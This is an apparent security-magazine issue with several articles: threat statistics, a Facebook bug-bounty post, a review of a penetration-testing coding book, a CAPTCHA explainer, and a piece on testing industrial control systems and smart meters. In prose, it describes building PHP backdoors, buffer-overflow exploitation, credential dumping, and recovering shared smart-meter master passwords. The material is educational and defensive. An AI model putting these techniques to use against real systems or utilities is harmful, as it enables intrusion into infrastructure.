Mobile Malware and Malicious Websites Put Consumers and Businesses at Risk Last year, mobile malware increased by 58 percent, and 32 percent of all mobile threats attempted to steal information, such as e-mail addresses and phone numbers. Surprisingly, these increases cannot necessarily be attributed to the 30 percent increase in mobile vulnerabilities. While Apple’s iOS had the most documented vulnerabilities, it only had one threat discovered during the same period. Android, by contrast, had fewer vulnerabilities but more threats than any other mobile operating system. Android’s market share, its open platform and the multiple distribution methods available to distribute malicious apps, make it the go-to platform for attackers. In addition, 61 percent of malicious websites are actually legitimate websites that have been compromised and infected with malicious code. Business, technology and shopping websites were among the top five types of websites hosting infections. Symantec attributes this to unpatched vulnerabilities on legitimate websites. In years passed, these websites were often targeted to sell fake antivirus to unsuspecting consumers. However, ransomware, a particularly vicious attack method, is now emerging as the malware of choice because of its high profitability for attackers. In this scenario, attackers use poisoned websites to infect unsuspecting users and lock their machines, demanding a ransom in order to regain access. Another growing source of infections on websites is malvertisements—this is when criminals buy advertising space on legitimate websites and use it to hide their attack code.

About the Internet Security Threat ReportThe Internet Security Threat Report provides an overview and analysis of the year in global threat activity. The report is based on data from Symantec’s Global Intelligence Network, which Symantec analysts use to identify, analyze, and provide commentary on emerging trends in attacks, malicious code activity, phishing, and spam.

About Symantec Symantec protects the world’s information, and is a global leader in security, backup and availability solutions. Our innovative products and services protect people and information in any environment – from the smallest mobile device, to the enterprise data center, to cloud-based systems. Our world-renowned expertise in protecting data, identities and interactions gives our customers confidence in a connected world. More information is available at www.symantec.com or by connecting with Symantec at: go.symantec.com/socialmedia.

Securitykaizen MagazineNew & News 26

www.bluekaizen.org

New & NewasSecuritykaizen MagazineNew & News27

www.bluekaizen.org

Updates to the Bug Bounty Program

Why a Bug Bounty Program?

Today I am writing about one recent improvement, our bug bounty program, that in a short time has proven valuable beyond our expectations.

Websites like Facebook that sit on the open Internet and offer a set of robust services don’t come together overnight. We hire the best and brightest, and have implemented numerous protocols, like our six-week intensive “boot-camp” and peer-reviewed code pushes, to ensure that only code that meets our rigorous standards is active on the site.

Even so, sometimes software code contains bugs. Generally speaking, there are bugs in software because of software complexity, programming errors, changes in requirements, errors made in bug tracking, limited documentation or bugs in software development tools. To deal with this, we have entire teams dedicated to searching out and disabling bugs, and we also hire outside auditors to help test our code. Our all night “bug-a-thons” are also successful in locating and fixing issues.We realize, though, that there are many talented and

well-intentioned security experts around the world who don’t work for Facebook. Over the years, we have received excellent support from independent researchers who have let us know about bugs they have found. A couple of years ago, we decided to to formalize a “whitehat” program to encourage these researchers to look for bugs and report them to us. We received really positive feedback when we launched our responsible disclosure policy last year, in which we told researchers we would not take adverse actions against them when they followed the policy

New & NewasSecuritykaizen MagazineNew & News 28

www.bluekaizen.org

in reporting bugs. Here’s a post from the Electronic Frontier Foundation, which praised our approach. As the EFF points out, “Well-meaning Internet users are often afraid to tell companies about security flaws they've found — they don't know whether they'll get...slapped with a lawsuit or even criminal prosecution.” We worked with several third-party groups to ensure that the language in our policy protects researchers and makes clear our intent to work with, not punish, those who report information. We are one of the first companies to clearly lay out our policy in order to make those who discover vulnerabilities more comfortable in reporting, and we are happy to see that other organizations are adopting a similar stance.

A few weeks ago, we took that program to the next level--we started paying rewards to those who report bugs to us. You can read about the details of the program here. We established this bug bounty program in an effort to recognize and reward these individuals for their good work and encourage others to join. It has been fascinating to watch the roll-out of this program from inside Facebook. First, it has been amazing to see how independent security talent around the world has mobilized to help. We know and have relationships with a large number of security experts, but this program has kicked off dialogue with a whole new and ever expanding set of people across the globe in over 16 countries, from Turkey to Poland who are passionate about Internet security. The program has already paid out more than $40,000 in only three weeks and one person has already received more than $7,000 for six different issues flagged. It has been a joy to engage in dialogue about issues and hear from the diverse perspectives these people bring.

The program has also been great because it has made our site more secure--by surfacing issues large and small, introducing us to novel attack vectors, and helping us improve lots of corners in our code. Because bug reports are often complicated and can involve complex legal issues, we chose our words carefully when announcing the program. Perhaps

because of this, there have been several inaccurate reports about how the program works. For example, some stories said that the maximum payment would be $500, when in fact that is the minimum amount we will pay. In fact, we’ve already paid a $5,000 bounty for one really good report. On the other end of the spectrum, we’ve had to deal with bogus reports from people who were just looking for publicity. Some have even asked that we extend the bounty program to the Facebook Platform (the applications and websites built and run by third parties that you can connect to your Facebook identity). Unfortunately, that’s just not practical because of the hundreds of thousands of independent Internet services implicated, but we do care deeply about security on the Platform. We have a dedicated Platform Operations team that scrutinizes these partners and we frequently audit their security and privacy practices. Additionally, we have built a number of backend tools that help automatically detect and disable spammy or malicious applications. People on our site agree that our protections, coupled with common sense, provide a rigorous level of security.

At the end of the day, we feel great knowing that we’ve launched another strong effort to help provide a secure experience on Facebook. A bug bounty program is a great way to engage with the security research community, and an even better way to improve security across a complex technological environment. Facebook truly does have the world’s best neighborhood watch program, and this program has proven that yet again for us.

I am the chief security officer of faceebook.com, i manage a few of the teams at facebook focused on making sure that people who use facebook have a safe and positive experience

Joe Sullivan

www.bluekaizen.org

Book Review29 Securitykaizen MagazineBook Review

Coding for Penetration TestersBuilding Better Tools

This book will be a valuable resource to those involved in penetration testing activities, as well as security professionals and network and system administrators. Those in development positions will find this information useful as well, from the stand point of developing better tools for their organization. In order to gain the most out of this book, some knowledge or experience is required. The book will go over networking, advanced windows commands and Web and application exploitation.

Python, PHP, Perl, ruby and power shell are all the programming/ controlling languages you need to know. You can use w3schools as an overview for each language structure/syntax and semantics of the commands.

Below is a review of Coding for penetration testers by Elsevier, written by Jason Andress and Ryan Linn.First I would like to thank the BK community for their contribution in developing my own skills.

Information Security Engineer

Muhammed M.Bassem

Book Review

www.bluekaizen.org

Securitykaizen MagazineBook Review 30

I was very excited during my journey with each chapter. The only problem I faced was that I got a mixture of syntax for each language, as such I messed up concatenation for two string syntax’s under PHP and Python. The authors give good tutorials and references for each language. My reaction before reading such a book was that I will need just two languages to do my assigned tasks under any penetration testing activity. This was a big joke after reading the first chapter. The author states that when we are attacking an environment, we don’t always get to choose the tools we have at hand and we may very well find ourselves in a situation where we are not able to, or are not allowed to install tools or utilities on a system. For that reason you have to add shell scripting to your skills because shells scripts allow us to string together complex sets of commands, develop tools, automate processes, manipulate files and more.

So who are the Authors of this book? They are: Jason Andress [ISSAP, CISSP , GPEN,C|EH]Is a seasoned security professional with a depth of experience in both the academic and business world. He holds a doctorate in Computer Science researching in the area of data protection. He has authored several publications and books, writing on topics including data security, network security, penetration testing and digital forensics.

Ryan Linn [OSCE ,GPEN and GWAPT ]Is a penetration tester, an author, a developer and an educator. He comes from a System Administration and web development background with many years of IT Security Experience

He is a regular contributor to Open source Projects such as Metasploit, The Browser Exploitation Framework and the Dradis Framework. Besides one of many security Conferences like “Defcon”.

Starting with chapter one, which is a good introduction to shell scripting. With my experience with bash script under debian based Linux, I passed through the first half of this chapter, while the other half was about power shell. It

wasn’t hard but difficult to understand that Microsoft has changed their mind in giving the administrator more power to manage his/her own Operating system. Besides some syntax problems as usual, when I first

used power shell I was happy that the “ls” command was working and after a few hours I figured out that Microsoft has put their own touch on the command complexity but with shell scripting knowledge

you could deal with power shell . The Second chapter was about python. The author started by explaining the power of Python.

First you will learn how to manipulate files using python, then go through client communication with server. Here you will need to have knowledge of what sockets are and how to use

them in sending/receiving over the channel you have. Also, don’t forget that blocks in python are determined by tabs. This is the most important thing to remember

during coding because Java/C++ and other languages use brackets to detect blocks. This is called syntax difference. Perl and Ruby were explored through the third and fourth chapters with the

same methodology. Learn syntax through basic paragraphs, practice and then put all the knowledge together to build something to do file manipulation and

network communication. Network communication as stated before relates to socket programming but you also

need to have background knowledge about what protocols are used for SNMP, SMB, FTP and SSH …..

By understanding network basics you start to understand where your first point is to get into the victim machine. The aim from this is not to build a black hat community, but to know where we have our weaknesses. So before you know where it is, you have to do a Proof of Concept “POC” that states you have a threat from this parameter. To do so you need to learn how to use those protocols under each language because we don’t always have a choice to install our own tools.

www.bluekaizen.org

Book Review31 Securitykaizen MagazineBook Review

Chapter five takes a different trend. It starts to talk about web applications. The author uses PHP as one of the web application development languages. He show us how to handle forms and command execution, beside file handling , the main idea I got from here was building backdoors using PHP for a compromised web server which supports PHP. It was a nice chapter from my perspective but we also need to take a look at how we could do so through ASP.NET and Java. PHP is the most used language in Web Application Development but now days it is not the only one.Till this point we didn’t practice any step of the Penetration Testing Methodology. Chapter Six talks about manipulating Windows using power shell, and expresses in depth the penetration testing uses for power shell.Chapter seven starts the first step of the Penetration Testing Methodology. Discovery in active mode, using scanners such as Nmap, Nessus, OPenVas and NetCat. The chapter shows how to use Nmap and Netcat to detect what ports are open/closed while Nessus /OpenVas do not just do fingerprinting or detecting the ports but also does vulnerability scanning. During this section the author introduces how to use NSE which allows Nmap to have extended power to detect vulnerabilities. It was good knowledge to have but you will still need to see how we are going to use the results of the data we collected about the target asset.

Chapter eight introduces you to another type of Discovery, passive mode. This means you are not going to have direct communication with the target. Just use a search engine to collect data and meta data similar to the harvester tool in backtrack. The author gives examples in Perl on how to extract meta data using the Google search Engine. It was amazing and helpful, especially if you are going to engage in external penetration testing activity. The more you hear the more you are able to understand, this is my comment on this chapter. “Copied from Matts quote during OSCP Course”

Chapter nine was the big party of this long journey. Here we are going to use the Metasploit framework and build our own script for exploiting targets in addition to python and php scripting. I explored different strategies and methodologies for exploitation using different languages. You will use python to create the war-FTPD exploit that leverages a buffer-overflow vulnerability to gain a remote shell. Once you do a POC, the author shows you how to turn the exploit into a more versatile Metasploit exploit using ruby. While under web application vulnerability, the author was interested in only three web vulnerabilities : Remote File Inclusion, XSS and command execution. It was great fun but this was not the end. I was happy to reach this point but victory was still not ours..

Chapter ten, the last chapter in this book guides you to victory. The problem is not just typing string “YOU HAVE BEEN HACKED” over the compromised system because this resource is not for the black hat community, it is for the white hat one, who have to care about data. A piece of information like a user name and password may be worth 1$ or may be ( 10^x )$. The attacker’s goal is to compromise more systems in your company’s infrastructure and through your assets, discover the infrastructure hierarchy, dumping usernames and passwords to the systems as well as enumerating groups and user privileges and bypassing login pages and dumping the databases. It was awesome and I feel the real power when I implemented this on my test lab using Virtual box

Summary: The machines have the power to manage the world, while humans are just pets. The world invests time and money to make life easier to build the World Wide Web to exchange information and building smart phones to facilitate communication in different ways. There is another door we have to see that someone could make use of to spy on you. You have to do regular assessments on your environment to discover their vulnerabilities and try to close these gaps before someone else knows about them. The mission is to decrease the risk level from an information security point of view which requires you to have hands on practice more and more about each technology you have or you know about. I recommend the readers of this book take a look at Perl, Ruby, Python and PHP basics before reading to make full use of this resource. Thank you for your time.

Book Review Securitykaizen MagazineBest Practice 32

www.bluekaizen.org

CAPTCHA

is not optional, it’s mandatory

Ahmed Fawzy

``

Securitykaizen MagazineBest Practice33

www.bluekaizen.org

What is CAPTCHA?

Web developers use CAPTCHA to ensure when data is entered into a web form, that it is a human doing so, not a hacker using malicious code that can generate automatic valid random data to fill the database with fake data or create fake accounts on the victim web site.

Every web form has an attribute named 'action', this attribute determines where the users input in this form will go, as shown in Figure 1; the attacker can write small code and send thousands of values to this page using the action attribute.

Smart developers will not accept any form data until the value of CAPTCHA match-es the words in the image.

<form name='form1' method='post' action='http://www.Victim.com/xyzaction.php'> Name <input name='name' type='text' id='Contactname'> Email <input name='email' type='text' id='email'> Message <textarea name='message' cols='43' rows='4' id='message'></textarea>

<input type='submit' name='Send' value='Send'> <input type='reset' name='Reset' value='Reset'> </form>

``

Securitykaizen MagazineBest Practice 34

www.bluekaizen.org

Benefits of using CAPTCHA:

1. Prevent denial of service attacks at the database levelThe main benefit of using CAPTCHA is to prevent automated attacks on registration and sign up forms. Hackers can write small code to generate valid random data that meets the validation conditions thus bypasses the valida-tion controls because it is valid data but it is also fake data; you can imagine what happens when thousands of random data populates your database, this will lead to a denial of service attack.

2. Prevent spam commentsSome websites allow users to comment on articles, stories or reports to increase the user interaction with the website. Hackers can target this feature with malicious code to spam the website with thousands of random com-ments to fill the website database.

3. Protect the online polls and questioner’s accuracy It is very easy for hackers to check one answer or option in a questioner or poll to drive the public opinion to his/her own opinion. Good developers will use CAPTCHA to restrict voting to humans only.

Why are CAPTCHA words so hard to read?This prevents hackers from writing malicious code that can scan the image and generate the answer of CAPTCHA automatically; so you must set the options of your CAPTCHA to generate using shadows, italic words, random lines ... Etc.

Figure 1

``

Securitykaizen MagazineBest Practice35

www.bluekaizen.org

Assessing and Exploiting Control Systems

Penetration testing is one of many different types of security assessments you can perform to find vulnerabilities in any type of computer system, including control systems found in every nations critical infrastructure. While many of us perform penetration testing on IT systems for several different industries, not many security professionals have had the opportunity to perform penetration testing on control systems. Having spent the last five years of my thirteen year career consulting and perform penetration tests in the energy sector, hopefully I can give a glimpse of how this differs from what I could consider traditional penetration tests that we perform on other systems.

One of the biggest differences when assessing control systems is their sensitivity to malformed traffic and the risk of bringing down one of the systems. Because of these issues, penetration testing is rarely done on live production control systems. Instead, penetration testing often focuses on the connectivity to the control systems from corporate networks and other remote access capabilities. This type of penetration testing isn’t any different than what you’d perform in a traditional penetration test.

However we also perform in-depth penetration testing on newly acquired systems before they are placed into production, often as part of the purchasing process. This type of penetration test often differs significantly from traditional penetration tests because it usually focuses on one type of control system from the master servers to the field/floor devices they control, not an entire network of disparate systems. But the biggest difference from traditional penetration tests is the depth to which we assess these systems. We don’t stop at assessing the operating systems, their network services, and their web applications. We go beyond this and dig into the control system network protocols, the proprietary RF signaling between field/floor devices, and the embedded electronics in the field devices. This allows us to identify and address vulnerabilities not only in the servers running Windows and Linux that attackers can get to through remote network connections, but also allows us to find vulnerabilities in the embedded electronics and non-TCP/IP based networks that many control systems device use that attackers can access through physical proximity.

``

Securitykaizen MagazineBest Practice 36

www.bluekaizen.org

The field/floor devices in control systems we test are usually embedded, microcontroller based devices that may not be running commodity operating system. This hardware is commonly deployed in areas where attackers could easily gain physical access such as on the sides of people’s homes, on power line pole-tops, in substations found near populous areas, and remote locations hours and sometimes days from human civilization. These embedded devices contain various electronic components that store data (EEPROM, Flash, RAM, MCU on-chip storage), communicate on buses that pass data between components (parallel buses and serial buses), and expose input interfaces used for administrative or debugging purposes (serial ports, parallel ports, infrared/optical ports).

The overarching goal for testing these embedded devices is to identify vulnerabilities that allow attackers to escalate their control from physical access to remote access or lesser physical access. Often these weaknesses show themselves in unprotected storage or transfer of sensitive information such as cryptographic keys, firmware, and any other information that an attacker can leverage to expand his attack. For example, in Advanced Metering Infrastructure (AMI) systems, we might successfully retrieve a smart meter’s C12.18 master password, a password that protects the optical interface on the front of smart meters deployed in the United States, enabling the tester to directly interface with the optical port on other meters without having to disconnect or dismantle the other meters. This assumes that the master C12.18 password is used throughout the smart meter deployment, which unfortunately is often the case in AMI systems.

The diagram below shows the overall process flow of the penetration testing tasks I use to test control systems devices and teach in my new class, Assessing and Exploiting Control Systems with SamuraiSTFU.Performing this work often required specialized tools and techniques. Here is the list of tools I often use to perform this type of work:

• Basic tools such as screw drivers, wire cutters, pliers, tin snips, etc. • Electronics equipment such as power supply, digital multimeter, and oscilloscope • Electronic prototyping supplies such as breadboard, wires, components, alligator �jumpers, etc. • Specialized tools to communicate directly with individual chips or capture serial �communications such as a Bus Pirate or commercial equivalent such as Total �Phase Aardvark/Beagle. • Universal JTAG tool such as a Bus Blaster, GoodFET, or a RIFF Box • Surface mount micro test clips • Electric meter test socket • Disassembler Software for the appropriate microprocessors to be tested • Entropy Analysis Software • Protocol Analysis Software

If you are interested in learning more about this testing methodology, check out my new open source project, the Samurai Security Testing Framework for Utilities (SamuraiSTFU) at http://www.SamuraiSTFU.org or the testing methodology I created for the United States Department of Energy named the NESCOR Guide to Penetration Testing for Electric Utilities, which you can find at http://www.smartgrid.epri.com.

I am the Managing Partner of UtiliSec, spe-cializing in Smart Grid security architecture design and penetration testing

Justin Searle